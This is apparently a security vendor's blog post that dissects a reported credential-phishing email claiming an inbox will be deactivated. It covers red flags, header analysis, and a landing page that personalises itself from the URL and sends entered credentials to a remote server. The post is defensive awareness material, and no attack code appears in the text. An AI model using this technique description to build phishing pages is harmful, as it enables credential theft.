Phishing Catch of the Day: Your Inbox Will be Deactivated

Read the full article at https://blog.knowbe4.com/phishing-catch-of-the-day-your-inbox-will-be-deactivated

In this series, our security experts will give a behind the scenes look at phishing emails that were reported to PhishER, KnowBe4’s Security Orchestration, Automation and Response (SOAR) platform. We will go in-depth to show you real-world attacks and how you can forensically examine phishing emails quickly.

Each Phishing Catch of the Day will focus on a single phish attempt and describe:

  • What context or pretexting exists between employee, hacker and email.
  • What red flags one can look for before falling victim.
  • What attack vector is being utilized and for what purpose.
  • What steps to take to inoculate users from similar attacks. The Initial Phish Breakdown

    Figure 1: PhishER Screenshot of Reported Phishing Email

    Early in the morning on Feb 11th, a Knowbe4 employee received an email that claims their inbox will be deactivated if they do not confirm their email address. The sender of this phish is hoping to generate an emotional reaction, causing a user to react without thinking.

    Phishing Warning Signs and Red Flags

    The best approach to consistently identify phishing is to simply ask oneself “Is this phishing?” whenever viewing an email or electronic message. The brain will naturally jump into a detective mindset and become resilient to emotional reaction.

    Scroll up to the first screenshot, put on your detective cap, and try to find as many red flags as you can before continuing!

    Figure 2: Red flags found in the phishing email

    Let’s gather more information from the headers of the email. Clicking on the Headers tab in PhishER will give you all headers pulled from the reported message in an easy-to-read format and highlights ip addresses and authentication information for you. Take a look at the Arc-Authentication-Results to figure out the original, non-spoofable, sender location.

    Figure 3: Arc-Authentication-Results from the Headers tab in PhishER

    It appears that the email is coming from an Amazon SES server and the originating ip is 23.251.242.1. You may be able to reach out to Amazon and report abuse if necessary, especially if this is an ongoing problem from this specific address.

    Phishing Attack Vector and Road to Compromise

    Opening up the link found in the email, we see the landing page below. 

    Figure 4: Phishing email landing page

    Notice the “NOPE” at the top and the fill-in for “nope@nope .com”. This is pulled from the ‘#’ anchor passed in to the page from the email URL. The page then uses javascript to style the form and add any icon found in Google images for the user’s email domain. This is to provide some familiarity to a victim and to imitate a generic login page that an individual might trust.

    Figure 5: Anchor passed in from the URL in the email body

    Upon entering their credentials, the page will run a js script to verify that the password and email fields are not empty and send the form contents to a remote server in Indonesia (which may explain why the email had been sent outside US business hours).

    Figure 6: JS code to POST user entered credentials to a remote server

    Figure 7: WHOIS of the domain found in the POST request

    Conclusions and Recommendations

    The attack described above is a perfect example of credential phishing. This is a tactic where a hacker will route you to a landing page that imitates a popular or important browser application in hopes that, when you enter your username and password, they can pocket the credentials to use at a later date. 

    This attack can be particularly harmful to your organization

    Read the full article at https://blog.knowbe4.com/phishing-catch-of-the-day-your-inbox-will-be-deactivated